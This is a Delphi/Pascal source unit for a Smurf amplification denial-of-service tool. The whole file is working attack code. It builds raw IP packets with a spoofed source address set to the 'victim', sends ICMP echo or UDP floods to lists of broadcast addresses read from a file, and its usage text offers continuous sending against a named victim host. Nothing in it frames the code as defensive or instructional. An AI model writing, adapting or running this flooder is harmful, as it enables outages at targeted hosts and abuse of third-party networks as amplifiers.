unit MainUnit;

interface

uses
  Winsock2, SysUtils2, SocketHeaders;

type
  TAttackType = set of (TICMP, TUDP);
  TBCastIPList = array of Cardinal;
  TPortList = array of Word;
  TSmurfOptions = packed record
    AttackType: TAttackType;
    Delay: Cardinal;
    BCastFile: TextFile;
    BCastList: TBCastIPList;
    HedefAdres: TSockAddrIn;
    Num: integer;
    PacketSize: integer;
    Padding: PChar;
    PaddingSize: integer;
    PFile: file;
    Sended: integer;
    Socket: TSocket;
    Victim: Cardinal;
    UDP_dstPortList: TPortList;
    UDP_srcPort: Word;
  end;

var
  SmurfOpt: TSmurfOptions;

  function GetPorts(S: string): TPortList;
  function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer;
  function Resolve(host: PChar): Cardinal;
  function SetBCastList: Integer;
  procedure CreateSocket;
  procedure LoadBCastFile;
  procedure LoadDataFile(S: string);
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure SmurfICMP(dst: Cardinal);
  procedure SmurfICMP_FillIPhdr(var IPhdr: PIPhdr; dst: Cardinal);
  procedure SmurfUDP(dst: Cardinal; Port: Word);
  procedure SmurfUDP_FillIPhdr(IPhdr: PIPhdr; dst: Cardinal);
  procedure SmurfUDP_FillUDPhdr(UDPhdr: PUDPhdr; IPhdr: PIPhdr; dstport: Word);
  procedure Usage(S: string);

implementation

function GetPorts(S: string): TPortList;
  procedure AddPort(Port: string);
  begin
    if StrtoIntDef(Port, -1) <> -1 then begin
      SetLength(Result, Length(Result) + 1);
      Result[High(Result)]:=StrtoInt(Port);
    end
      else Writeln('Skipping invalid port: ' + Port);
  end;
var
  i: integer;
  Port: string;
begin
  SetLength(Result, 0);
  i:=Pos(',', S);
  while i > 0 do begin
    Port:=Copy(S, 1, i - 1);
    AddPort(Port);
    Delete(S, 1, i);
    i:=Pos(',', S);
  end;
  AddPort(S);
end;

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer;
begin
  WSASetLastError(0);
  Result:=Sendto(s, Buf, len, flags, addrto, tolen);
  //if WSAGetLastError <> 0 then Writeln('Unable to send icmp packet no: ' + InttoStr(SmurfOpt.Sended));
  WSACancelBlockingCall;
  WSAUnhookBlockingHook;
end;

function Resolve(host: PChar): Cardinal;
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr:=inet_addr(host);
  if InAddr.S_addr = INADDR_NONE then begin
    HostEnt:=GetHostByName(host);
    if not Assigned(HostEnt) then begin
      Writeln('Unable to resolve victim host');
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length);
  end;
  Result:=InAddr.S_addr;
end;

function SetBCastList: Integer;
var
  S: string;
begin
  Result:=0;
  SetLength(SmurfOpt.BCastList, 0);
  while not (Eoln(SmurfOpt.BCastFile)) do begin
    Readln(SmurfOpt.BCastFile, S);
    S:=Trim(S);
    if (S > '') and (S[1] <> #0) and (S[1] <> '#') then begin
      SetLength(SmurfOpt.BCastList, Length(SmurfOpt.BCastList) + 1);
      SmurfOpt.BCastList[High(SmurfOpt.BCastList)]:=inet_addr(PChar(S));
      Inc(Result);
    end
      else Writeln('Skipping invalid bcast ip: ' + S);
  end;
  CloseFile(SmurfOpt.BCastFile);
end;

procedure CreateSocket;
begin
  SmurfOpt.Socket:=Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if SmurfOpt.Socket = INVALID_SOCKET then begin
    Writeln('Unable to create socket');
    Halt(0);
  end;
  if SetSockOpt(SmurfOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', Sizeof(PInteger)) <> 0 then begin
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

procedure LoadBCastFile;
begin
  if not ValidTextFile(SmurfOpt.BCastFile, ParamStr(2)) then begin
    Writeln('Unable to load bcast file');
    Halt(0);
  end
    else begin
      if SetBCastList = 0 then begin
        Writeln('No valid IP found on the bcast list');
        Halt(0);
      end;
    end;
end;

procedure LoadDataFile(S: string);
begin
  if not ValidFile(SmurfOpt.PFile, S) then begin
    Writeln('Unable to load data file');
    Halt(0);
  end;
  Seek(SmurfOpt.PFile, 0);
  SmurfOpt.PaddingSize:=FileSize(SmurfOpt.PFile);
  SmurfOpt.Padding:=AllocMem(SmurfOpt.PaddingSize);
  {$I-} BlockRead(SmurfOpt.PFile, SmurfOpt.Padding^, SmurfOpt.PaddingSize); {$I+}
  CloseFile(SmurfOpt.PFile);
end;

procedure SetDefaultOptions;
begin
  SmurfOpt.Victim:=Resolve(PChar(ParamStr(1)));
  SmurfOpt.AttackType:=[TICMP];
  SmurfOpt.Delay:=0;
  SmurfOpt.HedefAdres.sin_family:=AF_INET;
  SmurfOpt.HedefAdres.sin_port:=htons(1243);
  SmurfOpt.Num:=0;
  SmurfOpt.PacketSize:=64;
  SetLength(SmurfOpt.UDP_dstPortList, 1);
  SmurfOpt.UDP_dstPortList[0]:=7;
  SmurfOpt.UDP_srcPort:=0;
end;

procedure SetParams;
var
  i: integer;
  S: string;
  C: Char;
begin
  for i:=3 to ParamCount do begin
    S:=ParamStr(i);
    C:=#0;
    if Length(S) = 2 then if S[1] = '-' then C:=S[2];
    case C of
      'p' : begin
              SmurfOpt.UDP_dstPortList:=GetPorts(ParamStr(i + 1));
              if Length(SmurfOpt.UDP_dstPortList) = 0 then begin
                Writeln('No valid ports found in the list');
                Halt(0);
              end;
            end;
      's' : SmurfOpt.UDP_srcPort:=StrtoIntDef(ParamStr(i + 1), 0);
      'P' : begin
              if LowerCase(ParamStr(i + 1)) = 'icmp' then SmurfOpt.AttackType:=[TICMP]
                else if LowerCase(ParamStr(i + 1)) = 'udp' then SmurfOpt.AttackType:=[TUDP]
                  else if LowerCase(ParamStr(i + 1)) = 'both' then SmurfOpt.AttackType:=[TICMP, TUDP]
                    else begin
                      Writeln('Protocol must be icmp, udp or both');
                      Halt(0);
                    end;
            end;
      'S' : SmurfOpt.PacketSize:=StrtoIntDef(ParamStr(i + 1), 64);
      'f' : LoadDataFile(ParamStr(i + 1));
      'n' : SmurfOpt.Num:=StrtoIntDef(ParamStr(i + 1), 0);
      'd' : SmurfOpt.Delay:=StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

var
  Len: integer;

procedure SmurfICMP(dst: Cardinal);
var
  Buffer: PChar;
  IPhdr: PIPhdr;
  ICMPhdr: PICMPhdr;
begin
  Len:=28;
  if SmurfOpt.PacketSize > SmurfOpt.PaddingSize then Inc(Len, SmurfOpt.PacketSize)
    else Inc(Len, SmurfOpt.PaddingSize);
  Buffer:=AllocMem(Len);
  IPhdr:=PIPhdr(Buffer);
  ICMPhdr:=PICMPhdr(Buffer + 20);
  if SmurfOpt.PaddingSize > 0 then Move(SmurfOpt.Padding^, (Buffer + 28)^, SmurfOpt.PaddingSize);
  SmurfICMP_FillIPhdr(IPhdr, dst);
  ICMPhdr.icmp_type:=8;
  ICMPhdr.icmp_sum:=CheckSum(@ICMPhdr^, Len - 20);
  Gonder(SmurfOpt.Socket, Buffer^, Len, 0, SmurfOpt.HedefAdres, Sizeof(SmurfOpt.HedefAdres));
  FreeMem(Buffer);
end;

procedure SmurfICMP_FillIPhdr(var IPhdr: PIPhdr; dst: Cardinal);
begin
  IPhdr.ip_verlen:=$45;
  IPhdr.ip_len:=htons(Len);
  IPhdr.ip_id:=Random(65535);
  IPhdr.ip_ttl:=255;
  IPhdr.ip_p:=1;
  IPhdr.ip_src:=SmurfOpt.Victim;
  IPhdr.ip_dst:=dst;
  IPhdr.ip_sum:=CheckSum(@IPhdr^, 20);
  SmurfOpt.HedefAdres.sin_addr.S_addr:=IPhdr.ip_dst;
end;

procedure SmurfUDP(dst: Cardinal; Port: Word);
var
  Buffer: PChar;
  IPhdr: PIPhdr;
  UDPhdr: PUDPhdr;
begin
  Len:=28;
  if SmurfOpt.PacketSize > SmurfOpt.PaddingSize then Inc(Len, SmurfOpt.PacketSize)
    else Inc(Len, SmurfOpt.PaddingSize);
  Buffer:=AllocMem(Len);
  IPhdr:=PIPhdr(Buffer);
  UDPhdr:=PUDPhdr(Buffer + 20);
  if SmurfOpt.PaddingSize > 0 then Move(SmurfOpt.Padding^, (Buffer + 28)^, SmurfOpt.PaddingSize);
  SmurfUDP_FillIPhdr(IPhdr, dst);
  SmurfUDP_FillUDPhdr(UDPhdr, IPhdr, Port);
  Gonder(SmurfOpt.Socket, Buffer^, Len, 0, SmurfOpt.HedefAdres, Sizeof(SmurfOpt.HedefAdres));
  FreeMem(Buffer);
end;

procedure SmurfUDP_FillIPhdr(IPhdr: PIPhdr; dst: Cardinal);
begin
  IPhdr.ip_verlen:=$45;
  IPhdr.ip_len:=htons(Len);
  IPhdr.ip_id:=Random(65535);
  IPhdr.ip_ttl:=255;
  IPhdr.ip_p:=17;
  IPhdr.ip_src:=SmurfOpt.HedefAdres.sin_addr.S_addr;
  IPhdr.ip_dst:=dst;
  IPhdr.ip_sum:=CheckSum(@IPhdr^, 20);
  SmurfOpt.HedefAdres.sin_addr.S_addr:=IPhdr.ip_dst;
end;

procedure SmurfUDP_FillUDPhdr(UDPhdr: PUDPhdr; IPhdr: PIPhdr; dstport: Word);
var
  Buffer: PChar;
  pseudo: Ppseudohdr_udp;
begin
  Buffer:=AllocMem(Len - 8);
  pseudo:=Ppseudohdr_udp(Buffer);
  Random;
  UDPhdr.udp_sport:=htons(SmurfOpt.UDP_srcPort);
    if SmurfOpt.UDP_srcPort = 0 then UDPhdr.udp_sport:=htons(Random(65535));
  UDPhdr.udp_dport:=htons(dstport);
    if dstport = 0 then UDPhdr.udp_dport:=htons(Random(65535));
  UDPhdr.udp_ulen:=htons(Len - 20);
  Move(SmurfOpt.Padding^, (Buffer + 20)^, SmurfOpt.PaddingSize);
  pseudo.saddr:=IPhdr.ip_src;
  pseudo.daddr:=IPhdr.ip_dst;
  pseudo.protocol:=IPhdr.ip_p;
  pseudo.length:=UDPhdr.udp_ulen;
  pseudo.udphdr:=UDPhdr^;
  UDPhdr.udp_sum:=CheckSum(@Buffer^, Len - 8);
  FreeMem(Buffer);
  SmurfOpt.HedefAdres.sin_port:=UDPhdr.udp_dport;
end;

procedure Usage(S: string);
begin
  Write(
        'usage: ' + S + ' <victim> <broadcast file> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -p:    Comma separated list of dest ports         (default 7) (0 is random)'#13#10 +
        '  -s:    Source port                                (0 is random (default))'#13#10 +
        '  -P:    Protocols to use. Either icmp, udp or both (default icmp)'#13#10 +
        '  -S:    Data size in bytes                         (default 64)'#13#10 +
        '  -f:    Filename containg extra data               (not needed)'#13#10 +
        '  -n:    Num of packets to send                     (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)                              (default 0)'#13#10
       );
  Halt(0);
end;

end.
